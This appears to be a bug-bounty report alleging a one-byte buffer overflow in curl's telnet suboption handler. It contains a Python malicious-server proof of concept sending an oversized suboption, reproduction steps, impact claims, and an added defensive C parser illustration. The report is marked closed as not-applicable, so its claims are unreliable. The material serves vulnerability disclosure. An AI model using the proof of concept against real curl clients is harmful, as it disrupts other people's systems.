Curl Telnet Handler Buffer Overflow
Vulnerability Details
## Summary:
I found a buffer overflow in curl's telnet protocol handler that allows remote memory corruption without authentication. The bug is in the CURL_SB_ACCUM macro in lib/telnet.c line 69, where the bounds check lets you write one byte past the end of a 512-byte buffer. When curl receives 512+ bytes in a telnet suboption, it overflows into adjacent memory and corrupts the telnet state machine.
```python
import socket
import threading
import time


def exploit(port=8023):
    def handle(client):
        time.sleep(0.2)
        # IAC DO TERMINAL-TYPE (option 0x18)
        client.send(b'\xff\xfd\x18')
        time.sleep(0.3)
        # IAC SB, 513 bytes of suboption data, IAC SE
        payload = b'\xff\xfa' + b'A' * 513 + b'\xff\xf0'
        client.send(payload)
        client.close()

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(('127.0.0.1', port))
    s.listen(1)
    # Non-daemon thread: with daemon=True the interpreter exits right after
    # exploit() returns and the listener dies before curl can connect.
    threading.Thread(target=lambda: handle(s.accept()[0])).start()
    return s


exploit(8023)
```
## Affected version
curl 8.19.0-DEV (x86_64-pc-linux-gnu)
libcurl 8.19.0-DEV
Built from source on Ubuntu/Linux with debug enabled
Telnet protocol support enabled by default
## Steps To Reproduce:
1. Terminal 1: Run the exploit server
```bash
python3 poc.py
```
2. Terminal 2: Connect with curl
```bash
./src/curl telnet://127.0.0.1:8023
```
3. Expected result: curl hangs indefinitely due to memory corruption (timeout exit code 124)
4. Normal behavior: curl should connect and disconnect cleanly when connecting to a non-malicious server
The vulnerability triggers when curl receives a telnet suboption (IAC SB) followed by 513+ bytes of data, causing the subbuffer[512] to overflow into adjacent struct fields.
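As an added defensive illustration, not curl's code and not part of the report: a hypothetical suboption accumulator (`sb_parse`, `check_sb_len` and the `sb_state` struct are all assumed names) that performs the bounds check before the store, so a 512-byte suboption fits exactly while a 513-byte one, the shape of the report's payload, is rejected and skipped instead of being written past the end of the buffer.

```c
#include <string.h>
#define SB_MAX     512
#define TELNET_IAC 0xff
#define TELNET_SB  0xfa
#define TELNET_SE  0xf0
/* Hypothetical accumulator written for this page, not curl's lib/telnet.c: the
   bytes between IAC SB and IAC SE go into a fixed 512-byte buffer, and any
   suboption that does not fit is rejected instead of overrunning the buffer. */
struct sb_state {
    unsigned char buf[SB_MAX];
    size_t len;     /* bytes stored for the current suboption */
    int overflow;   /* 1 once the suboption exceeded SB_MAX */
};
/* Parse one IAC SB ... IAC SE frame. Returns 1 if accepted (st->len bytes in
   st->buf), 0 if too long and skipped (st->len == 0), -1 if malformed. */
int sb_parse(const unsigned char *in, size_t n, struct sb_state *st)
{
    size_t i;
    st->len = 0; st->overflow = 0;
    if (n < 4 || in[0] != TELNET_IAC || in[1] != TELNET_SB)
        return -1;
    for (i = 2; i < n; i++) {
        unsigned char c = in[i];
        if (c == TELNET_IAC) {                 /* IAC SE ends, IAC IAC escapes 0xff */
            if (++i >= n) return -1;
            if (in[i] == TELNET_SE) return st->overflow ? 0 : 1;
            if (in[i] != TELNET_IAC) return -1;
        }
        /* Check before storing: at len == SB_MAX the next write would hit buf[512] */
        if (st->overflow || st->len >= SB_MAX) {
            st->overflow = 1;                  /* drop data, resync on IAC SE */
            st->len = 0;
            continue;
        }
        st->buf[st->len++] = c;
    }
    return -1;                                 /* no IAC SE before input ended */
}
/* Run the report's frame shape (IAC SB, count x 'A', IAC SE) through sb_parse. */
int check_sb_len(size_t count)
{
    static unsigned char frame[SB_MAX + 8];    /* constructed sample input */
    struct sb_state st;
    if (count + 4 > sizeof frame) return -1;
    frame[0] = TELNET_IAC; frame[1] = TELNET_SB;
    memset(frame + 2, 'A', count);
    frame[count + 2] = TELNET_IAC; frame[count + 3] = TELNET_SE;
    return sb_parse(frame, count + 4, &st);
}
```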
## Impact
- **Denial of Service**: Confirmed - curl hangs indefinitely (timeout exit code 124)
- **Memory Corruption**: Overwrites adjacent struct fields in TELNET structure
- **State Machine Corruption**: Telnet protocol state becomes invalid
- **No Authentication Required**: Exploitable over network without credentials
## Report Stats
- Report ID: 3575475
- State: Closed
- Substate: not-applicable